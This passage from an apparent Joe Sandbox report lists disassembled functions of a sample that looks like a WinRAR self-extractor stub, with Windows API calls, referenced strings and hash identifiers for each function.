                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                    • String ID: LICENSEDLG
                                                                                    • API String ID: 3214253823-2177901306
                                                                                    • Opcode ID: 8548c82282c6687606edc22c343d363b41ca74d2928992214359066839cee201
                                                                                    • Instruction ID: 34be27a9a6e3a3ee10a83ec1f57ab02219d233977af3c547384fd8adb991aca8
                                                                                    • Opcode Fuzzy Hash: 8548c82282c6687606edc22c343d363b41ca74d2928992214359066839cee201
                                                                                    • Instruction Fuzzy Hash: 7521B431604205BBE3316A69ED49F7B3FBCFB5AB45F010414FAC499098CB6FA8019771
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,27EE1FB8,00000001,00000000,00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FD99
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE14
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0101FE1F
                                                                                    • _com_issue_error.COMSUPP ref: 0101FE48
                                                                                    • _com_issue_error.COMSUPP ref: 0101FE52
                                                                                    • GetLastError.KERNEL32(80070057,27EE1FB8,00000001,00000000,00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE57
                                                                                    • _com_issue_error.COMSUPP ref: 0101FE6A
                                                                                    • GetLastError.KERNEL32(00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE80
                                                                                    • _com_issue_error.COMSUPP ref: 0101FE93
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                    • String ID:
                                                                                    • API String ID: 1353541977-0
                                                                                    • Opcode ID: fc9adad3dd5cad7c93487d85bdc7041872b68f4c853c29dd5006a78a51973ceb
                                                                                    • Instruction ID: bf140e08184431db7b974a15e5e8e20b8ca89c14d803a2490dde74f185a75901
                                                                                    • Opcode Fuzzy Hash: fc9adad3dd5cad7c93487d85bdc7041872b68f4c853c29dd5006a78a51973ceb
                                                                                    • Instruction Fuzzy Hash: 3A411B71A00217ABDB10DF68C844BEFBBE9FB48B10F104269F995EB284D73D9504C7A0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                    • API String ID: 3519838083-3505469590
                                                                                    • Opcode ID: 2147d638cd8158ff0c209cae10e17e6839a91c1f03de55c6ec7906e5e6d3b79b
                                                                                    • Instruction ID: 7207fa42f4e8cad32a68352760d62e6085b9f82051d3e727763a4dab0f4027f9
                                                                                    • Opcode Fuzzy Hash: 2147d638cd8158ff0c209cae10e17e6839a91c1f03de55c6ec7906e5e6d3b79b
                                                                                    • Instruction Fuzzy Hash: 5F717F74B00219EFEB25DFA5C8959AEBBB9FF88710F04015DE596AB290CB356D01CB50
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 01009387
                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 010093AA
                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 010093C9
                                                                                      • Part of subcall function 0100C29A: _wcslen.LIBCMT ref: 0100C2A2
                                                                                      • Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1
                                                                                    • _swprintf.LIBCMT ref: 01009465
                                                                                      • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 010094D4
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 01009514
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                    • String ID: rtmp%d
                                                                                    • API String ID: 3726343395-3303766350
                                                                                    • Opcode ID: 6089b2336391db8c68cac2eb6113e2b63ec04640b8ec5e58ef23cd54113f1bd4
                                                                                    • Instruction ID: 6c871d4ed023099e9c59116efca6dfc5708b24ac7b699d2667ab094f29e3e869
                                                                                    • Opcode Fuzzy Hash: 6089b2336391db8c68cac2eb6113e2b63ec04640b8ec5e58ef23cd54113f1bd4
                                                                                    • Instruction Fuzzy Hash: BE41B471900259A6FF22EB61CC44EDE737CAF54349F0048E5A6CDE3082DB398BC88B60
                                                                                    APIs
                                                                                    • __aulldiv.LIBCMT ref: 0101122E
                                                                                      • Part of subcall function 0100B146: GetVersionExW.KERNEL32(?), ref: 0100B16B
                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 01011251
                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 01011263
                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 01011274
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 01011284
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 01011294
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 010112CF
                                                                                    • __aullrem.LIBCMT ref: 01011379
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                    • String ID:
                                                                                    • API String ID: 1247370737-0
                                                                                    • Opcode ID: fb1a626bf786737577eb16819ca2564bb2fed4b38167c4f18d606bcfc70ea8af
                                                                                    • Instruction ID: c58816a347762b16a986687b2ae2cdc61769bce80be2144e975bca92625e5424
                                                                                    • Opcode Fuzzy Hash: fb1a626bf786737577eb16819ca2564bb2fed4b38167c4f18d606bcfc70ea8af
                                                                                    • Instruction Fuzzy Hash: CC4107B1508306AFC754DF65C8849ABBBF9FF88214F00892EF6D6C6204E739E559CB52
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 01002536
                                                                                      • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                                                      • Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                    • API String ID: 3053425827-2277559157
                                                                                    • Opcode ID: 4308e38f9dbd4e020f9c28d07df30d2ff0e43c7d2a94fb945472a349a3545230
                                                                                    • Instruction ID: b00bfddbf71078920fbd15b6587dc51bc22943a1d932c61db0b363edee86153a
                                                                                    • Opcode Fuzzy Hash: 4308e38f9dbd4e020f9c28d07df30d2ff0e43c7d2a94fb945472a349a3545230
                                                                                    • Instruction Fuzzy Hash: 35F119706043429BFB17EB28C598BFE7BDA5F94300F0845BDEEC69B2C2CB6495458762
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                    • API String ID: 176396367-3568243669
                                                                                    • Opcode ID: 02cddaca2c61554bfc2140857eb0537ec81df76d8ebba31a667aa26f9be591c7
                                                                                    • Instruction ID: 01e22e2e6d2abbea84964a27813895f95d7ba3ef1aa2a810036fd3d266d65a0b
                                                                                    • Opcode Fuzzy Hash: 02cddaca2c61554bfc2140857eb0537ec81df76d8ebba31a667aa26f9be591c7
                                                                                    • Instruction Fuzzy Hash: 50515A2670032391EB746A6DD8317B673E4DFA0758F99045EEAC18B1C8FB6D88818261
                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0102FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0102F6CF
                                                                                    • __fassign.LIBCMT ref: 0102F74A
                                                                                    • __fassign.LIBCMT ref: 0102F765
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0102F78B
                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0102FE02,00000000,?,?,?,?,?,?,?,?,?,0102FE02,00000000), ref: 0102F7AA
                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0102FE02,00000000,?,?,?,?,?,?,?,?,?,0102FE02,00000000), ref: 0102F7E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    • Opcode ID: 9e3cb9afe3e8fee8ea54653eafd8b524151f3635baf79342708bf1779dd7ee4b
                                                                                    • Instruction ID: 65a1d511bb19669f7df425ab9cb1dcddc75edcf7d8d28d17e0bd504c170005a6
                                                                                    • Opcode Fuzzy Hash: 9e3cb9afe3e8fee8ea54653eafd8b524151f3635baf79342708bf1779dd7ee4b
                                                                                    • Instruction Fuzzy Hash: EF51B6B1D0025A9FDB10CFA8D885AEEFBF8FF09310F14415AE995E7251E771A940CBA0
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 01022937
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0102293F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 010229C8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 010229F3
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 01022A48
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 1170836740-1018135373
                                                                                    • Opcode ID: 06bfc4f05fc9d4475fb177d7d609e6c3a67f46acfdb95a9c46d0eb4ae11b0a87
                                                                                    • Instruction ID: f3f7b3ca64b21dfbc705c6b47e95f3eb92a020606cac315b7f150a5e2c7df5da
                                                                                    • Opcode Fuzzy Hash: 06bfc4f05fc9d4475fb177d7d609e6c3a67f46acfdb95a9c46d0eb4ae11b0a87
                                                                                    • Instruction Fuzzy Hash: 1941A230A00229AFCF10DFACC880A9EBFF5BF45364F1481A5E895AB392D775D955CB90
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000000), ref: 01019EEE
                                                                                    • GetWindowRect.USER32(?,00000000), ref: 01019F44
                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 01019FDB
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 01019FE3
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 01019FF9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$RectText
                                                                                    • String ID: RarHtmlClassName
                                                                                    • API String ID: 3937224194-1658105358
                                                                                    • Opcode ID: 68075019b895c002f67029064c5468feb9d67fa10530555958e737b20652f900
                                                                                    • Instruction ID: 0ad53bd097c111e328bfe78f90bff9c6bd1d125c2d8257d4577bc6f76f565399
                                                                                    • Opcode Fuzzy Hash: 68075019b895c002f67029064c5468feb9d67fa10530555958e737b20652f900
                                                                                    • Instruction Fuzzy Hash: 2741BF32504210EFDB625F689C48B6BBFB8FF48755F004599F9C99E05ACB39D908CBA1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                    • API String ID: 176396367-3743748572
                                                                                    • Opcode ID: 20bc620946a266f847a315b57d534d067da2229c7d0edcda8da3f8cad4dbfc4f
                                                                                    • Instruction ID: 38924c30123a56f2ce046835b1cd32376b6faf3910bc98440ca2b0d0564023b0
                                                                                    • Opcode Fuzzy Hash: 20bc620946a266f847a315b57d534d067da2229c7d0edcda8da3f8cad4dbfc4f
                                                                                    • Instruction Fuzzy Hash: EC31503364434655DE31AF589C51BBB73E8FB80714F90441EF8C68B284FA6CA94883E1
                                                                                    APIs
                                                                                      • Part of subcall function 0102C868: _free.LIBCMT ref: 0102C891
                                                                                    • _free.LIBCMT ref: 0102C8F2
                                                                                      • Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
                                                                                      • Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4
                                                                                    • _free.LIBCMT ref: 0102C8FD
                                                                                    • _free.LIBCMT ref: 0102C908
                                                                                    • _free.LIBCMT ref: 0102C95C
                                                                                    • _free.LIBCMT ref: 0102C967
                                                                                    • _free.LIBCMT ref: 0102C972
                                                                                    • _free.LIBCMT ref: 0102C97D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                    • Instruction ID: d49eef682295cc6da29031b70fd06714aba967410b75ace28d1d2930ad781325
                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                    • Instruction Fuzzy Hash: ED111F71580B26AAF520B7B1CD05FCF7BEC9F25B10F508C16F2DD66061DAA5B509CB50
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0101E669,0101E5CC,0101E86D), ref: 0101E605
                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0101E61B
                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0101E630
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule
                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                    • API String ID: 667068680-1718035505
                                                                                    • Opcode ID: e8f6cb3d95cbfd10081c7595d26ca8b5f1ead1182bb08c27738d45fb239e09ed
                                                                                    • Instruction ID: eed29a717fad5c5207547d9515824649d79a3a4fc0f0b95e3132f7e2b72a8293
                                                                                    • Opcode Fuzzy Hash: e8f6cb3d95cbfd10081c7595d26ca8b5f1ead1182bb08c27738d45fb239e09ed
                                                                                    • Instruction Fuzzy Hash: 3AF0C2317402229B5B734E69DC94A6E76CC6F8D6D13400CB9EEC5DB11DEB2DC4909B90
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0102891E
                                                                                      • Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
                                                                                      • Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4
                                                                                    • _free.LIBCMT ref: 01028930
                                                                                    • _free.LIBCMT ref: 01028943
                                                                                    • _free.LIBCMT ref: 01028954
                                                                                    • _free.LIBCMT ref: 01028965
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID: x)J
                                                                                    • API String ID: 776569668-2012010399
                                                                                    • Opcode ID: 638b2eb3bf9cc3d55d7349f90709da70725f134a2aaa68e9df8c33ecebc40b6e
                                                                                    • Instruction ID: 7ff9524b0f86b1994407ebefd027f95ceb16a152c988fe3a02356dbfe374467e
                                                                                    • Opcode Fuzzy Hash: 638b2eb3bf9cc3d55d7349f90709da70725f134a2aaa68e9df8c33ecebc40b6e
                                                                                    • Instruction Fuzzy Hash: 3AF03479911233ABA666BF28F8004493FE9FB287203044A07F5D89227DC77F4959DB91
                                                                                    APIs
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 010114C2
                                                                                      • Part of subcall function 0100B146: GetVersionExW.KERNEL32(?), ref: 0100B16B
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010114E6
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 01011500
                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 01011513
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 01011523
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 01011533
                                                                                    Memory Dump Source
